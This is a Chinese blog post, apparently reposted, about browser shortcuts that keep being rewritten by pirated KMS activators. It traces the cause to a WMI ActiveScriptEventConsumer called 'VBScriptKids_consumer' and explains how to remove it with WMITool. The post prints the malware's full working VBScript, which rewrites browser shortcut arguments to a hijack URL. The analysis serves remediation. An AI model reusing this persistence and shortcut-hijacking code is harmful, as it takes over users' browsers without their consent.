针对浏览器快捷方式不定时被修改的解决方案

研究了一段时间,终于知道了那些360,还有假小马KMS激活,不定时强行在浏览器快捷方式里加入特定网址的问题,是怎么执行的了。
如果有朋友中招,可以按照以下的方式去看看,也许能解决掉这个烦人的问题。

这东西竟然是个 WMI 下的脚本宿主,利用 WMI 中的 ActiveScriptEventConsumer,来触发执行的。

要查看WMI事件,到以下地址下载WMITool并安装,
https://www.microsoft.com/en-us/download/details.aspx?id=24045

安装后打开wbemeventviewer,点击左上角register for events,弹出Connect to namespace框,填入“root\\CIMV2”,确定,出现下图:

20160219152231616

这个叫“VBScriptKids_consumer”的脚本(学名:ActiveScriptEventConsumer)就是我们要找的流氓,右键删除应该就能解决了吧?

附上一下,这东西里的源代码,自己看看有哪些浏览器会中招。

On Error Resume Next:Const link = "https://so.wnoyng.cn/?r=x":Const link360 = "https://so.wnoyng.cn/?r=x&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,\r\n,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,\r\njuzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,\r\nsogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,\r\nwebgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\\Users\\Public\\Desktop,C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs,%USERPROFILE%\\Desktop,%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch,%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\StartMenu,%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar,%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:

——————欢迎转载,请保留以下文字——————-

本文转载自:苍翼无限
链接地址:针对浏览器快捷方式不定时被修改的解决方案

发表评论

电子邮件地址不会被公开。 必填项已用*标注